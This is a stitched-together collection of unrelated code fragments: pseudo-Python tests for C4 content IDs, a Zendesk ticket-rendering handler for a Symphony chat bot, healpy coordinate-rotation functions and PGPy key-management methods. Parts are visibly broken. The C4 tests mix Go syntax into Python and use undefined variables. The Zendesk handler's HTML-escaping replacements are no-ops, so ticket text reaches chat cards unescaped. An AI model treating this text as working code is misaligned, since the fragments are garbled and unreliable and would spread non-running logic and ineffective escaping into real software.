eprint("Incorrect comparison between %q, %q", id1, id2)
return False
if id2.Cmp(id1) != -1:
eprint("Incorrect comparison between %q, %q", id2, id1)
return False
if id1.Cmp(id1) != 0:
eprint("Incorrect comparison between %q, %q", id1, id1)
return False
return True
def TestCompareIDs():
tests = [
{
"id_a": c4.Identify(strings.NewReader("Test string")),
"id_b": c4.Identify(strings.NewReader("Test string")),
"exp": 0
},
{
"id_a": c4.Identify(strings.NewReader("Test string A")),
"id_b": c4.Identify(strings.NewReader("Test string B")),
"exp": -1
},
{
"id_a": c4.Identify(strings.NewReader("Test string B")),
"id_b": c4.Identify(strings.NewReader("Test string A")),
"exp": 1
},
{
"id_a": c4.Identify(strings.NewReader("Test string")),
"id_b": id,
"exp": -1
}
]
for test in tests:
if test["id_a"].Cmp(test["id_b"]) != test["exp"]:
eprint("Incorrect comparison between %q, %q", test["id_a"], test["id_b"])
return False
return True
def test_bytes_to_id():
byteData = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 58]
b = []
for num in byteData:
for c in num:
b.append(chr(c))
id = c4.ID(''.join(b))
if id.string() != "c41111111111111111111111111111111111111111111111111111111111111111111111111111111111111121":
eprint("IDs don't match, got %q, expcted %q", id.string(), "c41111111111111111111111111111111111111111111111111111111111111111111111111111111111111121")
return False
return True
def test_nil_id():
# ID of nothing constant
nilid = c4.Identify("")
if nilid.string() != "c459dsjfscH38cYeXXYogktxf4Cd9ibshE3BHUo6a58hBXmRQdZrAkZzsWcbWtDg5oQstpDuni4Hirj75GEmTc1sFT":
eprint("IDs don't match, got %q, expcted %q", nilid.string(), "c459dsjfscH38cYeXXYogktxf4Cd9ibshE3BHUo6a58hBXmRQdZrAkZzsWcbWtDg5oQstpDuni4Hirj75GEmTc1sFT")
return False
return True
test_vectors = ["alfa", "bravo", "charlie", "delta", "echo", "foxtrot", "golf", "hotel", "india"]
test_vector_ids = [
# Initial list (unsorted).
[
"<KEY>",
"<KEY>",
"<KEY>",
"<KEY>",
"<KEY>",
"<KEY>",
"<KEY>",
"<KEY>",
"<KEY>"
],
# After round 1
[
"<KEY>",
"<KEY>",
"<KEY>",
"<KEY>",
"<KEY>"
],
# After round 2
[
"<KEY>",
"<KEY>",
"<KEY>"
],
# After round 3
[
"<KEY>",
"<KEY>"
],
# Final ID
[
"<KEY>"
]
]
def test_identification():
for test in test_vectors :
c4id = c4.Identify(test)
if c4id.string() != test_vector_ids[0][i]:
eprint("IDs don't match, got %q expected %q", c4id.string(), test_vector_ids[0][i])
return False
return True
def view_bytes(b):
length = 4
out = fmt.Sprintf("(%d)[", len(b))
for j = 0; j < length; j++:
num = strconv.Itoa(int(b[j]))
out += fmt.Sprintf(" %s%s", strings.Repeat(" ", 3-len(num)), num)
out += fmt.Sprintf(" ... ")
offset = 64 - length
if len(b) >= 128:
for j := 64 - length; j < 64+length; j++:
if j == 64:
out += " |"
num = strconv.Itoa(int(b[j]))
out += fmt.Sprintf(" %s%s", strings.Repeat(" ", 3-len(num)), num)
offset = 128 - length
out += fmt.Sprintf(" ... ")
for j := offset; j < offset+length; j++:
num = strconv.Itoa(int(b[j]))
out += fmt.Sprintf(" %s%s", strings.Repeat(" ", 3-len(num)), num)
return out + " ]"
class testDataType:
def __init__(self, value, id, c4id):
self.value = value
self.id = id
self.c4id = c4id
def TestDigestSum():
test_data = []
for s in test_vectors:
dig = c4.Identify(s)
id, err = c4.parse(test_vector_ids[0][i])
if err != nil:
eprint("unexpected error %q", err)
if id.string() != dig.string():
eprint("IDs don't match, got %q expected %q", id, dig)
if id.string() != test_vector_ids[0][i]:
eprint("IDs don't match, got %q expected %q", id.string(), test_vector_ids[0][i])
test_data = append(test_data, testDataType{s, id, test_vector_ids[0][i]})
# pair := make([]byte, 0, 128)
# var l, r c4.ID
# var key string
# var id c4.ID
# lbytes, rbytes := make([]byte, 64), make([]byte, 64)
# for i, dta := range test_data {
# pair = append(pair, dta.Id[:]...)
# key = dta.Value
# id = dta.Id
# if i > 0 && i%2 == 1 {
# // right hand side
# t.Logf("%d: \"%s\"\n %s %s\n", i, key, id, viewBytes(dta.Id[:]))
# t.Logf("\tpair: %s\n", viewBytes(pair))
# r = dta.Id
# copy(rbytes, r[:])
# data := make([]byte, 64)
# switch r.Cmp(l) {
# case -1:
# copy(data, r[:])
# data = append(data, l[:]...)
# case 0:
# copy(data, l[:])
# case 1:
# copy(data, l[:])
# data = append(data, r[:]...)
# }
# t.Logf("\t l: %s\n\t r: %s\n", | |
name of the assignee given the assigneeID
conn.request("GET", "/api/v2/users/" + request_assignee, headers=headers)
res = conn.getresponse()
userAssigneeId = res.read()
tempUserAssignee = str(userAssigneeId.decode('utf-8'))
# data = json.dumps(tempUserAssignee, indent=2)
# data_dict = ast.literal_eval(data)
data_dict = json.loads(str(tempUserAssignee))
data = json.dumps(data_dict, indent=2)
d = json.loads(str(data))
assign_name = str(d["user"]["name"])
assigneeName = assign_name
except:
assigneeName = "N/A"
assignee_flag = True
requesterTicket = (_configDef['zdesk_config']['zdesk_link']) + str(request_id) + "/requester/requested_tickets"
assigneeTicket = (_configDef['zdesk_config']['zdesk_url']) + "/agent/users/" + str(request_assignee) + "/assigned_tickets"
OrgTicket = (_configDef['zdesk_config']['zdesk_link']) + str(request_id) + "/organization/tickets"
try:
# Convert the Zendesk ID to company name
conn.request("GET", "/api/v2/users/" + str(requestrequester_id) + "/organizations.json", headers=headers)
res = conn.getresponse()
companyID = res.read()
compNameRaw = str(companyID.decode("utf-8"))
data_dict = json.loads(str(compNameRaw))
data = json.dumps(data_dict, indent=2)
# data_dict = ast.literal_eval(data)
d = json.loads(data)
org_Name = str(d["organizations"][0]["name"])
org_name_temp = str(org_Name).replace("&", "&").replace("<", "<").replace('"',""").replace("'", "'").replace(">", ">")
orgName = str(org_name_temp)
# print(orgName)
except:
try:
botlog.LogSymphonyInfo("Inside Second try for Org name value")
# Convert the Zendesk ID to company namer
conn.request("GET", "/api/v2/users/" + str(requestrequester_id) + "/organizations.json",
headers=headers)
res = conn.getresponse()
companyID = res.read()
compNameRaw = str(companyID.decode("utf-8"))
data_dict = json.loads(str(compNameRaw))
data = json.dumps(data_dict, indent=2)
# data_dict = ast.literal_eval(data)
d = json.loads(data)
org_Name = str(d["organizations"][0]["name"])
org_name_temp = str(org_Name).replace("&", "&").replace("<", "<").replace('"',""").replace("'", "'").replace(">", ">")
orgName = str(org_name_temp)
# print(orgName)
except:
orgName = "N/A"
#messageDetail.ReplyToChat("Cannot get company info")
table_body = ""
if assignee_flag:
table_header = "<table style='border-collapse:collapse;border:2px solid black;table-layout:auto;width:100%;box-shadow: 5px 5px'><thead><tr style='background-color:#4D94FF;color:#ffffff;font-size:1rem' class=\"tempo-text-color--white tempo-bg-color--black\">" \
"<td style='width:15%;border:1px solid blue;border-bottom: double blue;text-align:center'>SUBJECT</td>" \
"<td style='border:1px solid black;text-align:left'>" + str(request_subject) + "</td></tr><tr>" \
"<td style='border:1px solid black;text-align:left' colspan=\"2\">" + str(request_desc) + "</td></tr><tr>" \
"<td style='width:3%;border:1px solid blue;border-bottom: double blue;text-align:center'>ID</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + (_configDef['zdesk_config']['zdesk_link']) + str(request_id) + "\">" + str(request_id) + "</a></td></tr><tr>" \
"<td style='width:4%;border:1px solid blue;border-bottom: double blue;text-align:center'>STATUS</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(requeststatus) + "</td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>PRIORITY</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_priority) + "</td></tr><tr>" \
"<td style='width:4.5%;border:1px solid blue;border-bottom: double blue;text-align:center'>SEVERITY</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_severity) + "</td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>COMPANY</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + str(OrgTicket) + "\">" + str(orgName) + "</a></td></tr><tr>" \
"<td style='width:7%;border:1px solid blue;border-bottom: double blue;text-align:center'>REQUESTER</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + str(requesterTicket) + "\">" + str(requesterName) + "</a></td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>CREATED</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_created) + "</td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>UPDATED</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_updated) + "</td></tr><tr>" \
"<td style='width:7%;border:1px solid blue;border-bottom: double blue;text-align:center'>ASSIGNEE</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(assigneeName) + "</td>" \
"</tr></thead><tbody></tbody></table>"
else:
table_header = "<table style='border-collapse:collapse;border:2px solid black;table-layout:auto;width:100%;box-shadow: 5px 5px'><thead><tr style='background-color:#4D94FF;color:#ffffff;font-size:1rem' class=\"tempo-text-color--white tempo-bg-color--black\">" \
"<td style='width:15%;border:1px solid blue;border-bottom: double blue;text-align:center'>SUBJECT</td>" \
"<td style='border:1px solid black;text-align:left'>" + str(request_subject) + "</td></tr><tr>" \
"<td style='border:1px solid black;text-align:left' colspan=\"2\">" + str(request_desc) + "</td></tr><tr>" \
"<td style='width:3%;border:1px solid blue;border-bottom: double blue;text-align:center'>ID</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + (_configDef['zdesk_config']['zdesk_link']) + str(request_id) + "\">" + str(request_id) + "</a></td></tr><tr>" \
"<td style='width:4%;border:1px solid blue;border-bottom: double blue;text-align:center'>STATUS</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(requeststatus) + "</td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>PRIORITY</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_priority) + "</td></tr><tr>" \
"<td style='width:4.5%;border:1px solid blue;border-bottom: double blue;text-align:center'>SEVERITY</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_severity) + "</td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>COMPANY</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + str(OrgTicket) + "\">" + str(orgName) + "</a></td></tr><tr>" \
"<td style='width:7%;border:1px solid blue;border-bottom: double blue;text-align:center'>REQUESTER</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + str(requesterTicket) + "\">" + str(requesterName) + "</a></td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>CREATED</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_created) + "</td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>UPDATED</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_updated) + "</td></tr><tr>" \
"<td style='width:7%;border:1px solid blue;border-bottom: double blue;text-align:center'>ASSIGNEE</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + str(assigneeTicket) + "\">" + str(assigneeName) + "</a></td>" \
"</tr></thead><tbody></tbody></table>"
# # Enable this to troubleshoot if there is any issue of character limitation
# UniqueToken = len(set(table_header.split()))
# print("Unique: " + str(UniqueToken))# + " Unique1: " + str(UniqueToken1))
# print("Ticket ID: " + str(ticketid))
#
# myTicketLenght = len(str(table_header))
# print(str(myTicketLenght))
# table_bodyFull += ("<card iconSrc =\"https://thumb.ibb.co/csXBgU/Symphony2018_App_Icon_Mobile.png\" accent=\"tempo-bg-color--blue\"><header><a href=\"" + (_configDef['zdesk_config']['zdesk_link']) + str(request_id) + "\">" + str(request_id) + "</a> (<a href=\"" + str(OrgTicket) + "\">" + str(orgName) + ")</a> " + str(request_subject) + " (assigned: " + "<a href=\"" + str(assigneeTicket) + "\">" + str(assigneeName) + "</a> Updated: " + str(request_updated) + " Status: " + str(requeststatus) + ")</header><body>" + table_header + "</body></card>")
table_bodyFull += ("<card iconSrc =\"\" accent=\"tempo-bg-color--blue\"><header><a href=\"" + (_configDef['zdesk_config']['zdesk_link']) + str(request_id) + "\">" + str(request_id) + "</a> (<a href=\"" + str(OrgTicket) + "\">" + str(orgName) + "</a>) " + str(request_subject) + " (assigned: " + "<a href=\"" + str(assigneeTicket) + "\">" + str(assigneeName) + "</a> Updated: " + str(request_updated) + " Status: " + str(requeststatus) + ")</header><body>" + table_header + "</body></card>")
reply = table_bodyFull
characterLimit = len(str(table_bodyFull))
#if characterLimit >= 70000:
if characterLimit >= int(_configDef['limit']['character']):
messageDetail.ReplyToChatV2("You have reached a character limitation. Ticket(s) from ID " + str(request_id) + " is/are not showing, please check against your given ticket list")
return messageDetail.ReplyToChatV2_noBotLog(str(reply))
break
try:
if wrongID:
if index == len(message_split) - 1:
return messageDetail.ReplyToChatV2(reply + "<p></p><b>There is no such Zendesk ticket number: " + str(wrongZDID) + "</b>")
except:
if index == len(message_split) - 1:
#messageDetail.ReplyToChatV2(reply)
#messageDetail.ReplyToChatV2_noBotLog("<card iconSrc =\"https://thumb.ibb.co/csXBgU/Symphony2018_App_Icon_Mobile.png\" accent=\"tempo-bg-color--blue\"><header>Please find the result below</header><body>" + reply + "</body></card>")
messageDetail.ReplyToChatV2_noBotLog(str(reply))
# else:
# return messageDetail.ReplyToChat("You aren't authorised to use this command. Please consult Symphony Support team")
except:
try:
botlog.LogSystemInfo("Inside Second try showZD")
streamType = (messageDetail.ChatRoom.Type)
#print(streamType)
showRequest = (messageDetail.Command.MessageText)
message_split = str(showRequest).split()
wrongZDID = ""
table_bodyFull = ""
reply = ""
isnext = False
for index in range(len(message_split)):
zdid = str(message_split[index]).strip()
assignee_flag = False
if len(message_split) == 1:
try:
conn = http.client.HTTPSConnection(_configDef['zdesk_config']['zdesk_api'])
headers = {
'username': _configDef['zdesk_config']['zdesk_email'] + "/token",
'password': _<PASSWORD>['<PASSWORD>_<PASSWORD>']['<PASSWORD>'],
'authorization': _configDef['zdesk_config']['zdesk_auth'],
'cache-control': "no-cache",
'Content-Type': 'application/json',
'zdesk_token': True
}
# base64Encoded = base64.b64encode(bytes((emailZendesk + "/token:" + _configDef['zdesk_config']['zdesk_password']), 'utf-8'))
# base64Enc = (base64Encoded.decode("utf-8"))
# print(str(base64Enc))
# base = ("Basic " + base64Enc)
# print(str(base))
#
# headers = {
# 'email_address': emailZendesk + "/token",
# 'password': (_<PASSWORD>['<PASSWORD>_<PASSWORD>']['<PASSWORD>']),
# 'authorization': base,
# 'cache-control': "no-cache",
# 'content-type': "application/json"
# }
conn.request("GET", "/api/v2/tickets/" + zdid + ".json", headers=headers)
res = conn.getresponse()
data_raw = res.read()
data = remove_emoji(data_raw)
#request_raw = data.decode("utf-8")
request_raw = str(data)
ticketDoesNotExist = "{\"error\":\"RecordNotFound","description\":\"Not found\"}"
if request_raw.startswith(ticketDoesNotExist):
return messageDetail.ReplyToChatV2("<b>There is no such Zendesk ticket number: " + str(zdid) + "</b>")
else:
isnext = True
messageDetail.ReplyToChat("Rendering the data from Zendesk for the requested ticket")
except:
return messageDetail.ReplyToChatV2("<b>There is no such Zendesk ticket number: " + str(zdid) + "</b>")
else:
try:
conn = http.client.HTTPSConnection(_configDef['zdesk_config']['zdesk_api'])
headers = {
'username': _configDef['zdesk_config']['zdesk_email'] + "/token",
'password': _configDef['zdesk_config']['zdesk_password'],
'authorization': _configDef['zdesk_config']['zdesk_auth'],
'cache-control': "no-cache",
'Content-Type': 'application/json',
'zdesk_token': True
}
conn.request("GET", "/api/v2/tickets/" + zdid + ".json", headers=headers)
res = conn.getresponse()
data = res.read()
request_raw = data.decode("utf-8")
ticketDoesNotExist = "{\"error\":\"RecordNotFound","description\":\"Not found\"}"
if request_raw.startswith(ticketDoesNotExist):
isnext = False
wrongID = True
wrongZDID += zdid + " "
else:
isnext = True
if index == 1:
messageDetail.ReplyToChat("Rendering the data from Zendesk for the requested tickets")
except:
isnext = False
wrongID = True
wrongZDID += zdid + " "
if isnext:
# try:
# data = json.dumps(request_raw, indent=2)
# data_dict = ast.literal_eval(data)
# d = json.loads(data_dict)
data_dict = json.loads(str(request_raw))
data = json.dumps(data_dict, indent=2)
d = json.loads(data)
#for index in range(len(request_raw["request"])):
# requestid = str(d["request"]["id"])
# requeststatus = d["request"]["status"]
# requestpriority = d["request"]["priority"]
# requestsubject = d["request"]["subject"]
# requestdescription_temps = d["request"]["description"]
# requestdescription = requestdescription_temps.replace("<", "<")
# requestorganization_id = str(d["request"]["organization_id"])
# requestrequester_id = str(d["request"]["requester_id"])
# #print(requestrequester_id)
# requestcreated_at = str(d["request"]["created_at"])
# requestupdated_at = str(d["request"]["updated_at"])
# requestassignee_id = str(d["request"]["assignee_id"])
requestid = str(d["ticket"]["id"])
requeststatus = str(d["ticket"]["status"])
requestpriority = str(d["ticket"]["priority"])
requestsubject_temp = str(d["ticket"]["subject"])
requestsubject = str(requestsubject_temp).replace("&", "&").replace("<", "<").replace('"', """).replace("'", "'").replace(">", ">")
requestdescription_temps = str(d["ticket"]["description"])
requestdescription = str(requestdescription_temps).replace("&", "&").replace("<", "<").replace('"', """).replace("'", "'").replace(">", ">").replace("\n\n \n\n \n\n \n\n", "<br/><br/>").replace("\n\n \n\n \n\n", "<br/><br/>").replace("\n\n \n\n \n", "<br/><br/>").replace("\n\n \n\n", "<br/><br/>").replace("\n\n", "<br/><br/>").replace("\n", "<br/>")
requestorganization_id = str(d["ticket"]["organization_id"])
requestrequester_id = str(d["ticket"]["requester_id"])
requestcreated_at = str(d["ticket"]["created_at"]).replace("T", " ").replace("Z", "")
| |
The angle theta (scalar or shape (N,))
or both angles (scalar or shape (2, N)) if phi is not given.
phi : float, scalar or array-like, optionnal
The angle phi (scalar or shape (N,)).
lonlat : bool
If True, input angles are assumed to be longitude and latitude in degree,
otherwise, they are co-latitude and longitude in radians.
Returns
-------
vec : array
The vector(s) corresponding to given angles, shape is (3,) or (3, N).
See Also
--------
:func:`vec2dir`, :func:`pixelfunc.ang2vec`, :func:`pixelfunc.vec2ang`
"""
if phi is None:
theta, phi = theta
if lonlat:
lon, lat = theta, phi
theta, phi = np.pi / 2.0 - np.radians(lat), np.radians(lon)
ct, st, cp, sp = np.cos(theta), np.sin(theta), np.cos(phi), np.sin(phi)
vec = np.empty((3, ct.size), np.float64)
vec[0, :] = st * cp
vec[1, :] = st * sp
vec[2, :] = ct
return vec.squeeze()
def angdist(dir1, dir2, lonlat=False):
"""Returns the angular distance between dir1 and dir2.
Parameters
----------
dir1, dir2 : float, array-like
The directions between which computing the angular distance.
Angular if len(dir) == 2 or vector if len(dir) == 3.
See *lonlat* for unit
lonlat : bool, scalar or sequence
If True, angles are assumed to be longitude and latitude in degree,
otherwise they are interpreted as colatitude and longitude in radian.
If a sequence, lonlat[0] applies to dir1 and lonlat[1] applies to dir2.
Returns
-------
angles : float, scalar or array-like
The angle(s) between dir1 and dir2 in radian.
Examples
--------
>>> import healpy as hp
>>> hp.rotator.angdist([.2,0], [.2, 1e-6])
array([ 1.98669331e-07])
"""
if hasattr(lonlat, "__len__") and len(lonlat) == 2:
lonlat1, lonlat2 = lonlat
else:
lonlat1 = lonlat2 = lonlat
dir1 = np.asarray(dir1)
dir2 = np.asarray(dir2)
if dir1.ndim == 2:
if dir1.shape[0] == 2: # theta, phi -> vec
vec1 = dir2vec(dir1, lonlat=lonlat1)
else:
vec1 = np.reshape(dir1, (3, -1))
vec1 = normalize_vec(vec1)
elif dir1.ndim == 1:
if dir1.shape[0] == 2: # theta, phi -> vec
vec1 = np.reshape(dir2vec(dir1, lonlat=lonlat1), (3, 1))
else:
vec1 = np.reshape(dir1, (3, 1))
vec1 = normalize_vec(vec1)
if dir2.ndim == 2:
if dir2.shape[0] == 2: # theta, phi -> vec
vec2 = dir2vec(dir2, lonlat=lonlat2)
else:
vec2 = np.reshape(dir2, (3, -1))
vec2 = normalize_vec(vec2)
elif dir2.ndim == 1:
if dir2.shape[0] == 2: # theta, phi -> vec
vec2 = np.reshape(dir2vec(dir2, lonlat=lonlat2), (3, 1))
else:
vec2 = np.reshape(dir2, (3, 1))
vec2 = normalize_vec(vec2)
# compute vec product
vec_prod = np.sqrt((np.cross(vec1.T, vec2.T) ** 2).sum(axis=1))
# compute scalar product
scal_prod = (vec1 * vec2).sum(axis=0)
return np.arctan2(vec_prod, scal_prod)
def normalize_vec(vec):
"""Normalize the vector(s) *vec* (in-place if it is a ndarray).
Parameters
----------
vec : float, array-like of shape (D,) or (D, N)
The D-vector(s) to normalize.
Returns
-------
vec_normed : float, array
Normalized vec, shape (D,) or (D, N)
"""
vec = np.array(vec, np.float64)
r = np.sqrt(np.sum(vec ** 2, axis=0))
vec /= r
return vec
#######################################################
#
# Manage the coord system conventions
#
def check_coord(c):
"""Check if parameter is a valid coord system.
Raise a TypeError exception if it is not, otherwise returns the normalized
coordinate system name.
"""
if c is None:
return c
if not isinstance(c, six.string_types):
raise TypeError(
"Coordinate must be a string (G[alactic],"
" E[cliptic], C[elestial]"
" or Equatorial=Celestial)"
)
if c[0].upper() == "G":
x = "G"
elif c[0].upper() == "E" and c != "Equatorial":
x = "E"
elif c[0].upper() == "C" or c == "Equatorial":
x = "C"
else:
raise ValueError(
"Wrong coordinate (either G[alactic],"
" E[cliptic], C[elestial]"
" or Equatorial=Celestial)"
)
return x
def normalise_coord(coord):
"""Normalise the coord argument.
Coord sys are either 'E','G', 'C' or 'X' if undefined.
Input: either a string or a sequence of string.
Output: a tuple of two strings, each being one of the norm coord sys name
above.
eg, 'E' -> ['E','E'], ['Ecliptic','G'] -> ['E','G']
None -> ['X','X'] etc.
"""
coord_norm = []
if coord is None:
coord = (None, None)
coord = tuple(coord)
if len(coord) > 2:
raise TypeError(
"Coordinate must be a string (G[alactic],"
" E[cliptic] or C[elestial])"
" or a sequence of 2 strings"
)
for x in coord:
coord_norm.append(check_coord(x))
if len(coord_norm) < 2:
coord_norm.append(coord_norm[0])
return tuple(coord_norm)
def normalise_rot(rot, deg=False):
"""Return rot possibly completed with zeroes to reach size 3.
If rot is None, return a vector of 0.
If deg is True, convert from degree to radian, otherwise assume input
is in radian.
"""
if deg:
convert = np.pi / 180.0
else:
convert = 1.0
if rot is None:
rot = np.zeros(3)
else:
rot = np.array(rot, np.float64).flatten() * convert
rot.resize(3, refcheck=False)
return rot
def get_rotation_matrix(rot, deg=False, eulertype="ZYX"):
"""Return the rotation matrix corresponding to angles given in rot.
Usage: matrot,do_rot,normrot = get_rotation_matrix(rot)
Input:
- rot: either None, an angle or a tuple of 1,2 or 3 angles
corresponding to Euler angles.
Output:
- matrot: 3x3 rotation matrix
- do_rot: True if rotation is not identity, False otherwise
- normrot: the normalized version of the input rot.
"""
rot = normalise_rot(rot, deg=deg)
if not np.allclose(rot, np.zeros(3), rtol=0.0, atol=1.0e-15):
do_rot = True
else:
do_rot = False
if eulertype == "X":
matrot = euler_matrix_new(rot[0], -rot[1], rot[2], X=True)
elif eulertype == "Y":
matrot = euler_matrix_new(rot[0], -rot[1], rot[2], Y=True)
else:
matrot = euler_matrix_new(rot[0], -rot[1], rot[2], ZYX=True)
return matrot, do_rot, rot
def get_coordconv_matrix(coord):
"""Return the rotation matrix corresponding to coord systems given
in coord.
Usage: matconv,do_conv,normcoord = get_coordconv_matrix(coord)
Input:
- coord: a tuple with initial and final coord systems.
See normalise_coord.
Output:
- matconv: the euler matrix for coord sys conversion
- do_conv: True if matconv is not identity, False otherwise
- normcoord: the tuple of initial and final coord sys.
History: adapted from CGIS IDL library.
"""
coord_norm = normalise_coord(coord)
if coord_norm[0] == coord_norm[1]:
matconv = np.identity(3)
do_conv = False
else:
eps = 23.452294 - 0.0130125 - 1.63889e-6 + 5.02778e-7
eps = eps * np.pi / 180.0
# ecliptic to galactic
e2g = np.array(
[
[-0.054882486, -0.993821033, -0.096476249],
[0.494116468, -0.110993846, 0.862281440],
[-0.867661702, -0.000346354, 0.497154957],
]
)
# ecliptic to equatorial
e2q = np.array(
[
[1.0, 0.0, 0.0],
[0.0, np.cos(eps), -1.0 * np.sin(eps)],
[0.0, np.sin(eps), np.cos(eps)],
]
)
# galactic to ecliptic
g2e = np.linalg.inv(e2g)
# galactic to equatorial
g2q = np.dot(e2q, g2e)
# equatorial to ecliptic
q2e = np.linalg.inv(e2q)
# equatorial to galactic
q2g = np.dot(e2g, q2e)
if coord_norm == ("E", "G"):
matconv = e2g
elif coord_norm == ("G", "E"):
matconv = g2e
elif coord_norm == ("E", "C"):
matconv = e2q
elif coord_norm == ("C", "E"):
matconv = q2e
elif coord_norm == ("C", "G"):
matconv = q2g
elif coord_norm == ("G", "C"):
matconv = g2q
else:
raise ValueError("Wrong coord transform :", coord_norm)
do_conv = True
return matconv, do_conv, coord_norm
###################################################
## ##
## euler functions ##
## ##
###### #######
def euler(ai, bi, select, FK4=0):
"""
NAME:
euler
PURPOSE:
Transform between Galactic, celestial, and ecliptic coordinates.
EXPLANATION:
Use the procedure ASTRO to use this routine interactively
CALLING SEQUENCE:
EULER, AI, BI, AO, BO, [ SELECT, /FK4, SELECT = ]
INPUTS:
AI - Input Longitude in DEGREES, scalar or vector. If only two
parameters are supplied, then AI and BI will be modified
to contain the output longitude and latitude.
BI - Input Latitude in DEGREES
OPTIONAL INPUT:
SELECT - Integer (1-6) specifying type of coordinate
transformation.
SELECT From To | SELECT From To
1 RA-Dec (2000) Galactic | 4 Ecliptic RA-Dec
2 Galactic RA-DEC | 5 Ecliptic Galactic
3 RA-Dec Ecliptic | 6 Galactic Ecliptic
If not supplied as a parameter or keyword, then EULER will prompt
for the value of SELECT
Celestial coordinates (RA, Dec) should be given in equinox J2000
unless the /FK4 keyword is set.
OUTPUTS:
AO - Output Longitude in DEGREES
BO - Output Latitude in DEGREES
INPUT KEYWORD:
/FK4 - If this keyword is set and non-zero, then input and output
celestial and ecliptic coordinates should be given in
equinox B1950.
/SELECT - The coordinate conversion integer (1-6) may
alternatively be specified as a keyword
NOTES:
EULER was changed in December 1998 to use J2000 coordinates | |
False
# privkey.sign("some text") <- this would raise an exception
with privkey.unlock("TheCorrectPassphrase"):
# privkey is now unlocked
assert privkey.is_unlocked
# so you can do things with it
sig = privkey.sign("some text")
# privkey is no longer unlocked
assert privkey.is_unlocked is False
Emits a :py:obj:`~warnings.UserWarning` if the key is public or not passphrase protected.
:param passphrase: The passphrase to be used to unlock this key.
:type passphrase: ``str``
:raises: :py:exc:`~pgpy.errors.PGPDecryptionError` if the passphrase is incorrect
"""
if self.is_public:
# we can't unprotect public keys because only private key material is ever protected
warnings.warn("Public keys cannot be passphrase-protected", stacklevel=3)
yield self
return
if not self.is_protected:
# we can't unprotect private keys that are not protected, because there is no ciphertext to decrypt
warnings.warn("This key is not protected with a passphrase", stacklevel=3)
yield self
return
try:
for sk in itertools.chain([self], self.subkeys.values()):
sk._key.unprotect(passphrase)
del passphrase
yield self
finally:
# clean up here by deleting the previously decrypted secret key material
for sk in itertools.chain([self], self.subkeys.values()):
sk._key.keymaterial.clear()
def add_uid(self, uid, selfsign=True, **prefs):
"""
Add a User ID to this key.
:param uid: The user id to add
:type uid: :py:obj:`~pgpy.PGPUID`
:param selfsign: Whether or not to self-sign the user id before adding it
:type selfsign: ``bool``
Valid optional keyword arguments are identical to those of self-signatures for :py:meth:`PGPKey.certify`.
Any such keyword arguments are ignored if selfsign is ``False``
"""
uid._parent = self
if selfsign:
uid |= self.certify(uid, SignatureType.Positive_Cert, **prefs)
self |= uid
def get_uid(self, search):
"""
Find and return a User ID that matches the search string given.
:param search: A text string to match name, comment, or email address against
:type search: ``str``, ``unicode``
:return: The first matching :py:obj:`~pgpy.PGPUID`, or ``None`` if no matches were found.
"""
if self.is_primary:
return next((u for u in self._uids if search in filter(lambda a: a is not None, (u.name, u.comment, u.email))), None)
return self.parent.get_uid(search)
def del_uid(self, search):
"""
Find and remove a user id that matches the search string given. This method does not modify the corresponding
:py:obj:`~pgpy.PGPUID` object; it only removes it from the list of user ids on the key.
:param search: A text string to match name, comment, or email address against
:type search: ``str``, ``unicode``
"""
u = self.get_uid(search)
if u is None:
raise KeyError("uid '{:s}' not found".format(search))
u._parent = None
self._uids.remove(u)
def add_subkey(self, key, **prefs):
"""
Add a key as a subkey to this key.
:param key: A private :py:obj:`~pgpy.PGPKey` that does not have any subkeys of its own
:keyword usage: A ``set`` of key usage flags, as :py:obj:`~constants.KeyFlags` for the subkey to be added.
:type usage: ``set``
Other valid optional keyword arguments are identical to those of self-signatures for :py:meth:`PGPKey.certify`
"""
if self.is_public:
raise PGPError("Cannot add a subkey to a public key. Add the subkey to the private component first!")
if key.is_public:
raise PGPError("Cannot add a public key as a subkey to this key")
if key.is_primary:
if len(key._children) > 0:
raise PGPError("Cannot add a key that already has subkeys as a subkey!")
# convert key into a subkey
npk = PrivSubKeyV4()
npk.pkalg = key._key.pkalg
npk.created = key._key.created
npk.keymaterial = key._key.keymaterial
key._key = npk
key._key.update_hlen()
self._children[key.fingerprint.keyid] = key
key._parent = self
##TODO: skip this step if the key already has a subkey binding signature
bsig = self.bind(key, **prefs)
key |= bsig
def _get_key_flags(self, user=None):
if self.is_primary:
if user is not None:
user = self.get_uid(user)
elif len(self._uids) == 0:
return {KeyFlags.Certify}
else:
user = next(iter(self.userids))
# RFC 4880 says that primary keys *must* be capable of certification
